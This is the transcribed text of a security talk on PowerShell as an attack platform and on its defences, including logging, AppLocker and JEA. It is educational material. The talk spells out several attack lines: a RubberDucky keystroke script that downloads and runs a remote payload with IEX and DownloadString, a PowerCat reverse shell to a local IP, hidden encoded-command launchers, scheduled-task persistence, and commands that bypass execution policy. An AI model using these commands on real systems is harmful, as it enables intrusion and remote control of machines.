the dark side of powershell by george dobrea
TRANSCRIPT
The Dark Side of PowerShellGeorge Dobrea
George [email protected] | @gdobrea
Microsoft Certified Trainer (since 1998)
MVP – Enterprise Security (since 2005)
EC-Council Instructor of the Year (2016)
My Last trips: Bucharest (home)
Tokyo
Phnom Penh / Cambodia
Washington DC
New Delhi
Dubai
London
Brussels
Vilnius, Tallinn, Riga
Finland
Peru
Germany
Toronto
Cape Town
Teaching / Consulting / Speaking / VolunteeringOr Just Travelling for Fun…
My First Public Speech about PowerShell Vulnerabilities in a MS conference…
> Get-content
PowerShell as an attack platform
PowerShell malware
Pen Testing tools based on PowerShell
PowerShell security, and bypassing that security
Defence strategies
PowerShell v5 new security features
PowerShell
Shell and scripting language present by default on all Windows machines.
… Now open sourced and available on Linux
Designed to automate things and make life easier for system admin.
Based on .Net framework and is tightly integrated with Windows.
Access to the Win32 and Native API
Easy to learn and to write scripts !
Tesla PowerShell Module
Current Landscape of PowerShell Threats
38 % of security incidents reported utilized PowerShell in some form or another
68 % of system breaches having some PowerShell involvement.
31 % of all reported incidents involving PowerShell drummed up no security alerts before the threat was discovered.
Carbon Black - United Threat Research Report 2016
“If PowerShell is a hammer, everything is a nail”
Why using PowerShell for attacks?
… Why Not?Powershell is an ideal platform for attackers
Installed by DEFAULT on Windows Systems
Provides access to almost everything in a Windows platform which could be useful for an attackero Registry, file system, active directory, networking, services, processes, WMI,
COM, Hyper-V
Run code in memory without touching disk
WinRM is enabled by DEFAULT on Windows Server
Trusted by countermeasures (AntiVirus) and SysAdmins
A wealth of attack / pen testing tools already exist: o Shellcode injectors, DLL injectors, keyloggers, port-scanners, reverse/bind
shells, botnets, hash dumping utilities
PowerShell attack code can be invoked by:
Microsoft Office Macro (VBA)
WMI
HTA Script (HTML Application – control panel extensions)
CHM (compiled HTML help)
Java JAR file
Other script type (VBS/WSH/BAT/CMD)
Typically an Encoded Command
Encoded commands obfuscate attack code and can even be compressed to avoid the Windows console character limitation (8191)
Powershell.exe –WindowStyle Hidden –noprofile –EncodedCommand <BASE64ENCODED>
Great, but how do I execute it on a victim machine ?
Code execution gained from an existing exploit
Via a website command injection vulnerability
Physical access – USB HID device
Stolen / captured credentials. With credentials, remote code execution
can be gained with: WMI
WSMAN
RDP, PowerShell Web Access ( yes, you can run PS from your smartphone ), etc…
New Malicious Attacks using PowerShell…
Real world PowerShell Malware
PowerWorm:
Infect’s Word and Excel documents, initial infection via macro in .doc/.xls
PoshKoder/PoshCoder:
PowerWorm crossed with CryptoLocker
Bitcoin ransom
DNSChanger
Trojan.DNSChanger circumvents Powershell restrictions
Valuable Resource for Pen Testers : PoshInternals
https://github.com/adamdriscoll/PoshInternals
Valuable Resource for Pen Testers : PowerSploit
https://github.com/mattifestation/PowerSploit
Valuable Resource for Pen Testers : PowerShellEmpire
http://www.PowerShellEmpire.com
Modules: Code Execution
Collection
Credentials
Exfiltration
Exploitation
Lateral Movement
Management
Persistence
Privilege Escalation
Recon
Situational Awareness
Fun & Trollsploit
Capabilities:
PowerShell based Remote Access
Trojan (RAT).
Python server component (Kali
Linux).
AES Encrypted C2 channel.
Dumps and tracks credentials in
database.
Use: Integrated modules providing
Initial Exploitation, Recon,
Credential Theft & Reuse, as well as
Persistence.
Valuable Resource for Pen Testers : Nishang
https://github.com/samratashok/nishang
Kali Linux – Social Engineering Toolkit (SET)
Kali Linux: More than 600 penetration testing tools included
- Some of them using PowerShell attack techniques
The SET has become a standard in the arsenal of the penetration tester
Demo
USB + PowerShell =
BadUSB RubberDucky Attack ( example #1)
BadUSB RubberDucky Attack ( example #2)
Create a PowerShell Meterpreter reverse TCP payload and place it somewhere on your Kali Linux Web Server
This bypasses most AV, HIPS, IDS and Firewalls and leaves no evidence on the system
DELAY 750GUI rDELAY 750STRING cmdDELAY 200ENTERDELAY 200STRING powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.132/powershell.ps1')DELAY 200ENTER
Administrative privileges required
Not persistent – limited to the current session
Limitations of PowerShell Attacks
Post Exploitation Attack Style
… Or better use PowerCat instead - this a PowerShell version of net cat
DELAY 500
CAPSLOCK
GUI R
DELAY 500
STRING POWERSHELL.EXE -EX UNRESTRICTED -C "IMPORT-MODULE('{0}:\POWERCAT.PS1' -F (GET-VOLUME -FILESYSTEMLABELDUCKY).DRIVELETTER); POWERCAT -C 192.168.56.101 -P443 -EP" -WINDOWSTYLE HIDDEN
ENTER
Example: RubberDucky & Powercat Reverse Shell
Basic methods (easy to implement, also to detect and remove) Registry Settings
Scheduled tasks
Advanced Persistent Mechanism: Permanent WMI
What if I want to persist my payloads
PS> schtasks /Create /SC ONIDLE /I 1 `/TN Updater /TR “powershell.exe `-Command Write-Host ‘Doing evil stuff…’“
Windows PowerShell Remoting and WinRM
PowerShell Remoting is based upon WinRM, Microsoft’s WS-Management implementation
Supports execution in 3 ways: Remote enabled commands
Remotely executed script blocks
Remote sessions
Security Model = Trusted Devices + User Credentials
WinRM is required for the Windows Server Manager
WinRM is enabled by DEFAULT on Windows 2012(R2) Server
WinRM is allowed through Windows Firewall on all network profiles!
PowerShell/Win32-OpenSSH - work in progress !
PowerShell Remoting Kerberos Double Hop Solved Securely
$ServerB = Get-ADComputer -Identity ServerB$ServerC = Get-ADComputer -Identity ServerCSet-ADComputer -Identity $ServerC -PrincipalsAllowedToDelegateToAccount $ServerB
No PowerShell code modification.
No more SPNs for constrained delegation!
Credentials are not stored on ServerB.
Multiple domains and forests supported across trusts.https://blogs.technet.microsoft.com/ashleymcglone/2016/08/30/powershell-remoting-kerberos-double-hop-solved-securely/
Resource-Based Kerberos Constrained Delegation is the solution !
PowerShell ‘Legacy’ Security Features
Administrative rights
UAC
Code Signing
Local or Remote source using zone.identifier alternate data stream
PowerShell Execution Policy
Bypassing Execution Policy ( Easy !!!)The PowerShell Execution Policy is not a security boundary
Simply ask PowerShell: powershell.exe –executionpolicy unrestricted
Switch the files zone.idenfier back to local: unblock-file yourscript.ps1
Read the script in and then execute it (may fail depending on script)
Encode the script and use –encodedcommand – always works!!
Get/Steal a certificate, sign script, run script
C:\> powershell.exe –executionpolicy bypass –windowstyle hidden –noninteractive –nologo –file “c:\exploit.ps1”
Operational Security / Dealing with Forensics
Change WinRM settings / Block WinRM ?
Application whitelisting - AppLocker Policies
Enabling Constrained Language Mode
Log PowerShell Activity
Detecting attacks on mitigations (audit any changes to profile.ps1 or the registry keys that control module logging)
PowerShell is not powershell.exe
powershell.exe is just a host application
it hosts the assembly that contains PowerShell and handles I/O
System.Management.Automation.dll
Blocking PowerShell.exe does not stop PowerShell attacks!
PowerShell v5 ♥ the Blue Team !
Over-the-shoulder transcription
Deep script block logging
Antimalware Scan Interface Integration
Cryptographic Message Syntax (CMS) encryption and decryption cmdlets
Secure code generation APIs
Applocker + Constrained Language Mode
Protected Event Logging
Preventing unrestricted admin access (JEA)
PowerShell Logging
PS > Get-EventLog – LogName “Windows PowerShell” - InstanceId 800 |`Where Message –match Add-Type | Select –First 10 | Format-List
Module Logging
Script Block Logging *
System-wide transcripts *
*Enabled by KB3000850 on Windows Server
2012 R2/ Windows 8.1 or WMF 5.0
Microsoft-Windows-PowerShell/Operational events: 4103 –Module logging
4104/4105/4106 –Script block logging
Limiting PowerShell Attack Capability with Constrained Language Mode
removing advanced feature support such as .Net & Windows API calls and COM access
The lack of this advanced functionality stops most PowerShell attack tools
Drawback: an environment variable must be set, either by running a command in PowerShell or via Group Policy
Pairing PowerShell v5 with AppLocker : PowerShell v5 detects when Applocker Allow mode is in effect and sets the
PowerShell language to Constrained Mode for interactive input and user-authored scripts, severely limiting the attack surface on the system
[Environment]::SetEnvironmentVariable(‘__PSLockdownPolicy‘, ‘4’, ‘Machine‘)
Just In Time, Just Enough Administration (JitJea)
based on Windows PowerShell constrained runspaces
allowing specific users to perform administrative tasks on servers without giving them administrator rights
auditing all actions that these users performed
Before JEA PS C:\> Copy-Item C:\SecureFiles\File.txt C:\Deployment\File.txtPS C:\> Get-Content C:\Deployment\File.txtInformation I should not see
Using JEA PS C:\> Copy-Item C:\SecureFiles\File.txt C:\Deployment\File.txtPS C:\> Get-Content C:\Deployment\File.txtThis command is not available
PS> Enter-PSSession Server1FAIL! – Talk to your supervisor for assistance“George I need to be admin on Server1 to restart SQL”
“No Eddie.Just use JEA and connect to the ‘Maintenance EndPoint”
PS> Enter-JeaSession Server1 –Name MaintenanceServer1> Restart-Service MSSQLSERVER
Server1Server1> Steal-SecretsError: You are not authorized to Steal-Secrets
Time to set PowerShell policies in your organization…Sample here:
Change ExecutionPolicy to only allow signed scripts to run.
Require all PowerShell scripts to be run from a specific location or path.
Discourage (or require exception for) the use of encoded parameters on the command line.
Discourage (or block) PowerShell scripts from downloading content from the Internet (or specify a “whitelist” of allowed IP addresses only).
Discourage (or block) the use of PowerShell to invoke commands on remote systems.
Require a custom parameter to be passed on all “legitimate” PowerShell usage.
Restrict PowerShell to specific users in your organization.
Require PowerShell to be launched from a specific process.
Useful Resources
PowerShell Galery• https://www.powershellgallery.com/
Hey, Scripting Guy! Blog• http://blogs.technet.com/b/heyscriptingguy/
Just Enough Administration (JEA)• https://msdn.microsoft.com/en-us/powershell/jea/using-jea
Practical Persistence with PowerShell • http://www.exploit-monday.com/2013/04/PersistenceWithPowerShell.html>
PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection https://adsecurity.org/?p=2921
PowerShell Version 5 Security Enhancements• https://adsecurity.org/?p=2277
Blogs of PowerShell gurus: • Jeffrey Snower, Matt Graeber, Adam Driscoll, Sean Metcalf, Will Schroeder
Thank you !
Questions?
George Dobrea
XEduco.net | @gdobrea